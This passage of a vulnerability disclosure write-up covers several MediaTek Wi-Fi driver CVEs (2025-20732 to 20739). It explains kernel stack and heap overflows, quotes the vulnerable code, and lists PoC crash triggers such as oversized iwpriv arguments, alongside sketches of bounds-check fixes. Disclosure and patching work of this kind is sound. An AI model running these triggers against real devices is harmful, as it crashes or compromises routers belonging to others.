<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code> when handling the <code class="language-plaintext highlighter-rouge">OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT (0x969)</code> OID. The issue is caused by the use of the attacker-controlled value <code class="language-plaintext highlighter-rouge">wrq-&gt;u.data.length</code> in the call to <code class="language-plaintext highlighter-rouge">copy_from_user()</code> without performing an upper bounds check to ensure the size of the data will not overflow the destination buffer. In this case, the destination is the <code class="language-plaintext highlighter-rouge">nr_list_info</code> structure, which lives on the stack and has a size of (512 + 4 + 4) = <em>520 bytes</em>. Therefore, size values greater than 520 bytes will result in kernel stack corruption.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">case</span> <span class="n">OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT</span><span class="p">:</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">is_oce_rnr</span><span class="p">(</span><span class="n">dev</span><span class="p">))</span> <span class="p">{</span>
			<span class="p">...</span>
			<span class="c1">// @hypr: VULNERABLE - overflow nr_list_info structure</span>
            <span class="n">status</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nr_list_info</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
            <span class="n">station_obj</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">cfg</span><span class="p">.</span><span class="n">mbssid</span><span class="p">[</span><span class="n">ap_idx</span><span class="p">];</span>
			<span class="p">...</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Vulnerable systems must have the <code class="language-plaintext highlighter-rouge">OceReducedNeighborReport</code> driver configuration flag set to 1.</p>
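<p>To make the size arithmetic concrete, here’s a rough userspace sketch of the length check on the outer copy. The structure layout is an assumption that simply adds up to the 520 bytes mentioned above (the <code class="language-plaintext highlighter-rouge">reserved</code> field is a guess), <code class="language-plaintext highlighter-rouge">fetch_request()</code> is a hypothetical name, and <code class="language-plaintext highlighter-rouge">memcpy()</code> plays the role of <code class="language-plaintext highlighter-rouge">copy_from_user()</code>:</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical layout that adds up to the 520 bytes quoted above. */
struct nr_list_req {
	uint8_t  Value[512];
	uint32_t ValueLen;
	uint32_t reserved; /* assumed 4-byte field; name and position are a guess */
};
_Static_assert(sizeof(struct nr_list_req) == 512 + 4 + 4, "expected 520 bytes");

/*
 * Userspace stand-in for the ioctl copy. The request is rejected unless
 * `length` fits inside the destination structure.
 */
static int fetch_request(struct nr_list_req *dst, const void *user_ptr,
			 size_t length)
{
	if (length > sizeof(*dst))
		return -1;
	memset(dst, 0, sizeof(*dst)); /* short requests leave no stale bytes */
	memcpy(dst, user_ptr, length);
	return 0;
}
```

<p>A 520-byte request passes and a 521-byte one is refused. The same comparison of the request length against the destination size is what’s missing in the <code class="language-plaintext highlighter-rouge">RT_OID_WSC_SET_CON_WPS_STOP</code> handler covered next, where the destination is a heap allocation instead of a stack variable.</p>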

<h4 id="poc-8">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20732.c">PoC Link</a></p>

<p>Execute the PoC on the target system running a vulnerable driver to trigger a kernel crash:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># trigger the vulnerability</span>
./ioctl-ocernr-overflow rai0 2000
</code></pre></div></div>

<h3 id="cve-2025-20733-heap-overflow-in-rt_oid_wsc_set_con_wps_stop-handler">CVE-2025-20733: Heap Overflow in RT_OID_WSC_SET_CON_WPS_STOP Handler</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0, MT7629 v6.0.3.0, MT7981 driver v7.6.7.2</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), SpaceX Starlink Wifi Gen2</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code> when handling the OID for <code class="language-plaintext highlighter-rouge">RT_OID_WSC_SET_CON_WPS_STOP (0x764)</code>.  Within the body of the switch-case that handles this OID, an allocation is made of <code class="language-plaintext highlighter-rouge">sizeof(WSC_UPNP_CTRL_WSC_BAND_STOP)</code> and saved to the pointer <code class="language-plaintext highlighter-rouge">upnp_data_struct</code>. Assuming the allocation succeeds, a block is entered where <code class="language-plaintext highlighter-rouge">copy_from_user()</code> is called to copy data from userspace and write it to the memory allocated to <code class="language-plaintext highlighter-rouge">upnp_data_struct</code>, using <code class="language-plaintext highlighter-rouge">wrq-&gt;u.data.length</code> as the size argument for the copy operation.</p>

<p>No upper bounds check is performed on the value in <code class="language-plaintext highlighter-rouge">wrq-&gt;u.data.length</code>, which is attacker-controlled, prior to its use in the call to <code class="language-plaintext highlighter-rouge">copy_from_user()</code>, leading to a heap buffer overflow if an attacker provides a <code class="language-plaintext highlighter-rouge">length</code> value that is greater than <code class="language-plaintext highlighter-rouge">sizeof(WSC_UPNP_CTRL_WSC_BAND_STOP)</code> (which evaluates to 12 bytes).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="n">RT_OID_WSC_SET_CON_WPS_STOP</span><span class="p">:</span> <span class="p">{</span>
	<span class="n">alloc_mem</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">upnp_data_struct</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">WSC_UPNP_CTRL_WSC_BAND_STOP</span><span class="p">));</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">upnp_data_struct</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// @hypr: VULNERABLE</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="n">upnp_data_struct</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-9">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20733.c">PoC Link</a></p>

<p>Execute the PoC with a large bufsize argument:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc ra0 2048
</code></pre></div></div>

<h3 id="cve-2025-20734-heap-overflow-in-set_secwpapsk_proc">CVE-2025-20734: Heap Overflow in Set_SecWPAPSK_Proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0, MT7629 v6.0.3.0, MT7981 driver v7.6.7.2</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), SpaceX Starlink Wifi Gen2</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">CONFIG_AP_SUPPORT</code> and <code class="language-plaintext highlighter-rouge">WSC_AP_SUPPORT</code> must be enabled in the build configuration.</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">Set_WPAPSK_Proc()</code> when processing an attacker-controlled argument string. The function first checks if the length of the argument string is less than 65. If so, it enters a block where the key data is set. However, if the length exceeds 65, the function does not treat this as an error and continues execution.</p>

<p>If the <code class="language-plaintext highlighter-rouge">WSC_STA_SUPPORT</code> build flag is enabled, the vulnerable code block is included in the function and is reached after the check above. Within this block:</p>

<ol>
  <li>The length of the attacker-controlled argument string is calculated using <code class="language-plaintext highlighter-rouge">strlen()</code></li>
  <li>The length value is used as the length argument in a call to <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code> to write to <code class="language-plaintext highlighter-rouge">dev-&gt;ctrl.WpaPsk</code></li>
</ol>

<p>No bounds checking is performed on the length of the argument string before this copy operation. Since <code class="language-plaintext highlighter-rouge">ctrl-&gt;WpaPsk</code> is statically sized at 64 bytes, any argument string longer than 64 bytes will overflow the buffer. Additionally, because <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code> is used for the copy operation, the payload bytes are copied verbatim; the only restriction is that the length comes from <code class="language-plaintext highlighter-rouge">strlen()</code>, so the copied data cannot contain embedded null bytes.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">Set_WPAPSK_Proc</span><span class="p">(</span><span class="n">adapter_obj</span> <span class="o">*</span><span class="n">obj</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">arg</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="cp">#ifdef WSC_STA_SUPPORT
</span>    <span class="c1">// @hypr: VULNERABLE</span>
    <span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">dev</span><span class="o">-&gt;</span><span class="n">ctrl</span><span class="p">.</span><span class="n">WpaPsk</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">arg</span><span class="p">));</span>
<span class="cp">#endif
</span><span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-10">PoC</h4>

<p>Execute the commands below on a system running the vulnerable driver to trigger the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">WPAPSK</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*8000)"</span><span class="si">)</span>

<span class="c"># force use of corrupted pointers</span>
iwpriv ra0 <span class="nb">set </span><span class="nv">WscConfStatus</span><span class="o">=</span>2
</code></pre></div></div>

<h3 id="cve-2025-20735-heap-overflow-in-mtk_send_offchannel_action_frame">CVE-2025-20735: Heap Overflow in mtk_send_offchannel_action_frame</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Requirements</strong>: Driver must be built with <code class="language-plaintext highlighter-rouge">DPP_SUPPORT</code> configuration option (this should also enable the <code class="language-plaintext highlighter-rouge">CHANNEL_SWITCH_MONITOR_CONFIG</code> flag)</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">mtk_send_offchannel_action_frame()</code>. The function allocates a fixed-size heap buffer <code class="language-plaintext highlighter-rouge">OutBuffer</code> of 2304 bytes using the <code class="language-plaintext highlighter-rouge">MlmeAlloc()</code> macro. However, the function subsequently calls <code class="language-plaintext highlighter-rouge">MakeOutgoingFrame()</code> to copy attacker-controlled data into this buffer without validating the size of the data. The size of the data to be copied is determined by the <code class="language-plaintext highlighter-rouge">frm-&gt;frm_len</code> field, which is passed from userspace via the IOCTL handler. If an attacker specifies a value larger than 2304 bytes, the <code class="language-plaintext highlighter-rouge">memmove()</code> operation in <code class="language-plaintext highlighter-rouge">MakeOutgoingFrame()</code> will write beyond the bounds of the allocated buffer, resulting in a heap buffer overflow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span>
    <span class="p">...</span>
    <span class="c1">// Allocate a fixed-size buffer of 2304 bytes</span>
    <span class="n">status</span> <span class="o">=</span> <span class="n">MlmeAlloc</span><span class="p">(</span><span class="n">pAd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">OutBuffer</span><span class="p">);</span>
    <span class="p">...</span>
    <span class="c1">// Vulnerable: No bounds checking on frm-&gt;frm_len</span>
    <span class="n">MakeOutgoingFrame</span><span class="p">(</span><span class="n">OutBuffer</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">FrameLen</span><span class="p">,</span>
                      <span class="k">sizeof</span><span class="p">(</span><span class="n">HEADER_802_11</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">Hdr</span><span class="p">,</span>
                      <span class="n">frm</span><span class="o">-&gt;</span><span class="n">frm_len</span><span class="p">,</span> <span class="n">frm</span><span class="o">-&gt;</span><span class="n">frm</span><span class="p">,</span>
                      <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
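
<p>For illustration, here is a minimal userspace sketch of the kind of check that is missing before the copy. It is not MediaTek's fix: <code class="language-plaintext highlighter-rouge">frame_append()</code> and <code class="language-plaintext highlighter-rouge">OUT_BUF_SIZE</code> are hypothetical names, and the only value taken from the driver is the 2304-byte allocation size.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define OUT_BUF_SIZE 2304u  /* allocation size described above */

/* Hypothetical helper: append `len` bytes at offset `*used` only if they fit.
 * Returns 0 on success, -1 if the copy would run past the buffer. */
static int frame_append(unsigned char *out, size_t *used,
                        const void *src, size_t len)
{
    assert(out != NULL && used != NULL && src != NULL);
    /* Compare against the space that is left, not the total size. */
    if (*used > OUT_BUF_SIZE || len > OUT_BUF_SIZE - *used)
        return -1;
    memcpy(out + *used, src, len);
    *used += len;
    return 0;
}
```

<p>The point of tracking <code class="language-plaintext highlighter-rouge">used</code> is that the header has already eaten into the buffer by the time the attacker-controlled payload is appended, so the limit for the payload is smaller than 2304.</p>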

<h4 id="poc-11">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20735.c">PoC Link</a></p>

<p>Compile and execute the PoC like this:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc ra0 5000
</code></pre></div></div>

<h3 id="cve-2025-20736-stack-overflows-in-set_igmpsn_addentry_proc-and-set_igmpsn_delentry_proc">CVE-2025-20736: Stack Overflows in Set_IgmpSn_AddEntry_Proc and Set_IgmpSn_DelEntry_Proc</h3>

<p><em>This was another fun one. This pair of Add/Delete functions both contain basically the same bug which results in a buffer overflow. MediaTek argued that one of these was a duplicate by their definition because, and I kid you not, the two bugs occur in the same <strong>file</strong>.</em></p>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Requirement</strong>: <code class="language-plaintext highlighter-rouge">VENDOR_FEATURE6_SUPPORT</code> enabled</li>
</ul>

<h4 id="set_igmpsn_delentry_proc">Set_IgmpSn_DelEntry_Proc</h4>
<p>The vulnerability occurs in <code class="language-plaintext highlighter-rouge">Set_IgmpSn_DelEntry_Proc()</code> while parsing an IP address from the argument string passed in from userspace. A <code class="language-plaintext highlighter-rouge">for</code> loop calls <code class="language-plaintext highlighter-rouge">rstrtok()</code> with the <code class="language-plaintext highlighter-rouge">.</code> character as a separator to split the string into individual octets, converts each token with <code class="language-plaintext highlighter-rouge">strtol()</code>, and writes the result to <code class="language-plaintext highlighter-rouge">ip_addr[i]</code>. Nothing in the loop checks that the <code class="language-plaintext highlighter-rouge">i</code> iterator stays within the bounds of the <code class="language-plaintext highlighter-rouge">ip_addr[4]</code> buffer, so every token past the fourth is written out of bounds. This results in an OOB write that can be used to corrupt the kernel stack whenever the string contains more than four <code class="language-plaintext highlighter-rouge">.</code>-separated tokens.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">while</span> <span class="p">((</span><span class="n">c</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">((</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">input</span><span class="p">,</span> <span class="s">"-"</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">value</span> <span class="o">=</span> <span class="n">rstrtok</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="s">"."</span><span class="p">);</span> <span class="n">value</span><span class="p">;</span> <span class="n">value</span> <span class="o">=</span> <span class="n">rstrtok</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="s">"."</span><span class="p">))</span> <span class="p">{</span>
				<span class="p">...</span>
                <span class="c1">// unbounded for loop with rstrtok will keep reading as long as '.' are found</span>
                <span class="n">ip_addr</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="p">)</span><span class="n">strtol</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
                <span class="n">i</span><span class="o">++</span><span class="p">;</span>
            <span class="p">}</span>
		<span class="p">...</span>
        <span class="p">}</span>
</code></pre></div></div>
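
<p>A bounded version of that loop could look roughly like the sketch below. This is a userspace model, not driver code: it uses the standard <code class="language-plaintext highlighter-rouge">strtok()</code> in place of the driver's <code class="language-plaintext highlighter-rouge">rstrtok()</code>, and <code class="language-plaintext highlighter-rouge">parse_ipv4_octets()</code> and <code class="language-plaintext highlighter-rouge">IP_ADDR_LEN</code> are names I made up for the example.</p>

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define IP_ADDR_LEN 4

/* Hypothetical bounded version of the octet loop. `text` is modified in
 * place by strtok(). Returns 0 on exactly four octets, -1 otherwise. */
static int parse_ipv4_octets(char *text, unsigned char ip_addr[IP_ADDR_LEN])
{
    int i = 0;
    char *value;

    assert(text != NULL && ip_addr != NULL);
    for (value = strtok(text, "."); value; value = strtok(NULL, ".")) {
        if (i >= IP_ADDR_LEN)
            return -1;      /* a fifth token would land past ip_addr[3] */
        ip_addr[i++] = (unsigned char)strtol(value, NULL, 10);
    }
    return i == IP_ADDR_LEN ? 0 : -1;
}
```

<p>The only change that matters is the index check before the write; everything else mirrors the shape of the vulnerable loop.</p>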

<p>The vulnerability can be triggered using the following payload, which sends an overlong sequence formatted to reach the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># trigger the bug by sending overlong '65.' sequence</span>
iwpriv ra0 <span class="nb">set </span><span class="nv">IgmpDel</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s1">'print("65."*200)'</span><span class="si">)</span>
</code></pre></div></div>

<h4 id="set_igmpsn_addentry_proc">Set_IgmpSn_AddEntry_Proc</h4>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">Set_IgmpSn_AddEntry_Proc()</code> when handling parsing of an IP address value from the argument string passed in from userspace. The vulnerable logic for this function is identical to that shown in <code class="language-plaintext highlighter-rouge">Set_IgmpSn_DelEntry_Proc()</code> above.</p>

<p>The vulnerability can be triggered using the following payload, which sends an overlong sequence formatted to reach the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># trigger the bug in the Add handler</span>
iwpriv ra0 <span class="nb">set </span><span class="nv">IgmpAdd</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('65.'*400)"</span><span class="si">)</span>
</code></pre></div></div>

<h3 id="cve-2025-20737-stack-overflow--info-leak-in-oid_802_11_passphrases-handler">CVE-2025-20737: Stack Overflow + Info Leak in OID_802_11_PASSPHRASES Handler</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
</ul>

<p>The vulnerability occurs in the handler for <code class="language-plaintext highlighter-rouge">OID_802_11_PASSPHRASES</code> (0x0536). The code creates a fixed-size stack structure <code class="language-plaintext highlighter-rouge">NDIS80211PSK psk</code> and then uses <code class="language-plaintext highlighter-rouge">copy_from_user()</code> to copy data from user space into this structure without validating that the incoming data size matches the structure size. The size of the structure is 68 bytes, meaning any length value greater than 68 will result in kernel stack corruption. Additionally, the code goes on to use whatever value is in the struct member <code class="language-plaintext highlighter-rouge">WPAKeyLen</code> to print that many bytes from the contents of the <code class="language-plaintext highlighter-rouge">WPAKey[]</code> buffer without any bounds checking, resulting in disclosure of kernel memory to userspace in the kernel message buffer (dmesg).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="n">OID_802_11_PASSPHRASES</span><span class="p">:</span> <span class="p">{</span>
	<span class="p">...</span>
    <span class="c1">// stack allocated struct</span>
    <span class="n">NDIS80211PSK</span> <span class="n">psk</span><span class="p">;</span>
	<span class="p">...</span>
    <span class="c1">// VULNERABLE - copies user-provided data of arbitrary length into fixed stack buffer</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">psk</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
	<span class="p">...</span>
    <span class="c1">// VULNERABLE - uses user-provided length value to dump the contents of the WPAKey buffer, resulting in information leak if a size</span>
    <span class="c1">// larger than the WPAKey buffer is provided.</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span> <span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">psk</span><span class="p">.</span><span class="n">WPAKeyLen</span> <span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">debug_log</span><span class="p">((</span><span class="s">"%c"</span><span class="p">,</span> <span class="n">psk</span><span class="p">.</span><span class="n">WPAKey</span><span class="p">[</span><span class="n">i</span><span class="p">]));</span>
<span class="p">}</span>
</code></pre></div></div>
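
<p>Both problems come down to trusting a length from userspace. The sketch below models the two checks in plain userspace C. The struct layout is an assumption on my part (a 4-byte length plus a 64-byte key matches the 68 bytes mentioned above, but the real definition may differ), and <code class="language-plaintext highlighter-rouge">struct psk_model</code> and <code class="language-plaintext highlighter-rouge">load_psk()</code> are hypothetical names.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Assumed layout: 4-byte length + 64-byte key = the 68 bytes noted above.
 * The real NDIS80211PSK definition may differ. */
struct psk_model {
    unsigned int  key_len;
    unsigned char key[64];
};

/* Hypothetical handler core: `src`/`src_len` stand in for the user pointer
 * and wrq->u.data.length. Returns 0 on success, -1 on a rejected request. */
static int load_psk(struct psk_model *psk, const void *src, size_t src_len)
{
    assert(psk != NULL && src != NULL);
    if (src_len != sizeof(*psk))
        return -1;                  /* refuse anything but an exact-size struct */
    memcpy(psk, src, sizeof(*psk)); /* copy_from_user() in the driver */
    if (psk->key_len > sizeof(psk->key))
        return -1;                  /* never walk past key[] when logging */
    return 0;
}
```

<p>The first check closes the stack overflow and the second closes the info leak; they are independent, so fixing one without the other still leaves a bug.</p>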

<h4 id="poc-12">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20737.c">PoC Link</a></p>

<p>Execute the PoC with the following parameters:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc ra0 0x8536 1600
</code></pre></div></div>

<h3 id="cve-2025-20738-stack-overflow-in-set_apscan_proc">CVE-2025-20738: Stack Overflow in Set_ApScan_Proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0, MT7629 v6.0.3.0</li>
</ul>

<p>The <code class="language-plaintext highlighter-rouge">Set_ApScan_Proc()</code> function contains a <code class="language-plaintext highlighter-rouge">while</code> loop that reads characters from the input argument string and writes them to a fixed-size stack buffer <code class="language-plaintext highlighter-rouge">dest[33]</code>. The loop continues until it encounters a NUL byte in the input string. The issue is that there’s no check to ensure that the index <code class="language-plaintext highlighter-rouge">i</code> used to access the <code class="language-plaintext highlighter-rouge">dest</code> array remains within bounds (0-32). If the input string is longer than 33 bytes and doesn’t contain a colon (<code class="language-plaintext highlighter-rouge">:</code>) or NUL byte within the first 33 characters, the loop will write beyond the bounds of the <code class="language-plaintext highlighter-rouge">dest[]</code> array, causing a stack buffer overflow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span>
	<span class="p">...</span>
    <span class="kt">char</span> <span class="n">dest</span><span class="p">[</span><span class="mi">33</span><span class="p">];</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">arg</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">!=</span> <span class="sc">'\0'</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// VULNERABLE - unbounded write to dest[i]</span>
        <span class="n">dest</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">arg</span><span class="p">[</span><span class="n">j</span><span class="p">];</span>
        <span class="n">j</span><span class="o">++</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">dest</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="sc">':'</span> <span class="o">||</span> <span class="n">arg</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'\0'</span><span class="p">)</span> <span class="p">{</span>
	        <span class="c1">// break</span>
        <span class="p">}</span>
        <span class="n">i</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>
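
<p>As a rough sketch of a bounded alternative, the loop can refuse to advance once the buffer is full. This is a simplified userspace model rather than a drop-in replacement: unlike the original loop it does not store the <code class="language-plaintext highlighter-rouge">:</code> delimiter, and <code class="language-plaintext highlighter-rouge">copy_field()</code> and <code class="language-plaintext highlighter-rouge">DEST_LEN</code> are hypothetical names.</p>

```c
#include <assert.h>
#include <stddef.h>

#define DEST_LEN 33

/* Hypothetical bounded copy of one ':'-delimited field from `arg`.
 * Copies at most DEST_LEN - 1 bytes and always NUL-terminates on success.
 * Returns the number of bytes copied, or -1 if the field does not fit. */
static int copy_field(const char *arg, char dest[DEST_LEN])
{
    size_t i = 0;

    assert(arg != NULL && dest != NULL);
    while (arg[i] != '\0' && arg[i] != ':') {
        if (i >= DEST_LEN - 1)
            return -1;      /* field is longer than the buffer: reject */
        dest[i] = arg[i];
        i++;
    }
    dest[i] = '\0';
    return (int)i;
}
```

<p>Rejecting the input outright is a design choice for the sketch; silently truncating would also stop the overflow but can hide malformed input.</p>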

<h4 id="poc-13">PoC</h4>

<p>Execute the command below on a system running the vulnerable driver to trigger the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">ApScanChannel</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*1000)"</span><span class="si">)</span>
</code></pre></div></div>

<h3 id="cve-2025-20739-stack-overflow-in-set_igmpsn_blacklist_proc">CVE-2025-20739: Stack Overflow in Set_IgmpSn_BlackList_Proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Requirements</strong>:
    <ul>
      <li>Configuration: IGMP Snooping enabled, IGMP TV mode enabled</li>
      <li>Required features/build flags: <code class="language-plaintext highlighter-rouge">IGMP_TVM_SUPPORT</code>, <code class="language-plaintext highlighter-rouge">IGMP_SNOOP_SUPPORT</code>, <code class="language-plaintext highlighter-rouge">CONFIG_VENDOR_FEATURE10_SUPPORT</code></li>
    </ul>
  </li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">Set_IgmpSn_BlackList_Proc()</code> when copying the argument string in <code class="language-plaintext highlighter-rouge">arg</code> to the fixed-size char buffer <code class="language-plaintext highlighter-rouge">ip_str[100]</code> using <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>. The size argument given for the copy operation is calculated by measuring the length of the string in <code class="language-plaintext highlighter-rouge">arg</code> (the source buffer) without any upper-bounds check to ensure the length of the argument string does not exceed the size of the destination buffer. An argument string which contains more than 100 characters will result in a buffer overflow of the <code class="language-plaintext highlighter-rouge">ip_str[]</code> buffer.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="kt">char</span> <span class="n">ip_str</span><span class="p">[</span><span class="mi">100</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="sc">'\0'</span><span class="p">};</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">p_ip_str</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">...</span>
    <span class="k">do</span> <span class="p">{</span>
		<span class="p">...</span>
        <span class="n">p_ip_str</span> <span class="o">=</span> <span class="n">ip_str</span><span class="p">;</span>
		<span class="c1">// @hypr: VULNERABLE</span>
        <span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">p_ip_str</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">arg</span><span class="p">));</span>
</code></pre></div></div>
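
<p>The missing piece is a comparison between the source length and the destination size before the copy. A minimal userspace sketch, with <code class="language-plaintext highlighter-rouge">memcpy()</code> standing in for <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code> and the hypothetical names <code class="language-plaintext highlighter-rouge">copy_ip_string()</code> and <code class="language-plaintext highlighter-rouge">IP_STR_LEN</code>:</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define IP_STR_LEN 100

/* Hypothetical checked copy: rejects arguments that do not fit in the
 * destination with their terminator. Returns 0 on success, -1 otherwise. */
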